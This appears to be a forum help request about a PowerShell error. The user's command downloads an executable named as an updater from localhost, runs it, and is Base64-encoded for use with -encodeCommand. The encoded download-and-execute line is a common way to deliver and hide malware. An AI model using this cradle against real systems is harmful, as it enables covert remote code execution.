Hello again, I discovered that the command uncoded bad, but I do not understand what is wrong:
My Code :
$command = "(New-Object System.Net.WebClient).DownloadFile('http://localhost/update_program.exe','updater.exe'); Start-Process 'updater.exe'"
$bytes = [Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand
Return
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGU AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBsAG8AYwBhAG wAaABvAHMAdAAvAHUAcABkAGEAdABlAF8AcAByAG8AZwByAGEAbQAuAGUAeABlACcALAAnAHUAcABkA GEAdABlAHIALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAHUAcABk AGEAdABlAHIALgBlAHgAZQAnAA==
I try :
powershell -encodeCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAAvAHUAcABkAGEAdABlAF8AcAByAG8AZwByAGEAbQAuAGUAeABlACcALAAnAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAHUAcABkAGEAdABlAHIALgBlAHgAZQAnAA==
Return
Missing expression after unary operator '-'.
In line: 1 Character: 2
+ - <<<< encodeCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUA
dAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQ
AcAA6AC8ALwBsAG8AYwBhAGwAaABvAHMAdAAvAHUAcABkAGEAdABlAF8AcAByAG8AZwByAGEAbQAuAG
UAeABlACcALAAnAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvA
GMAZQBzAHMAIAAnAHUAcABkAGEAdABlAHIALgBlAHgAZQAnAA==
+ CategoryInfo : ParserError: (-:String) [], ParentContainsErrorR
ecordException
+ FullyQualifiedErrorId : MissingExpressionAfterOperator
Because my command coded fails?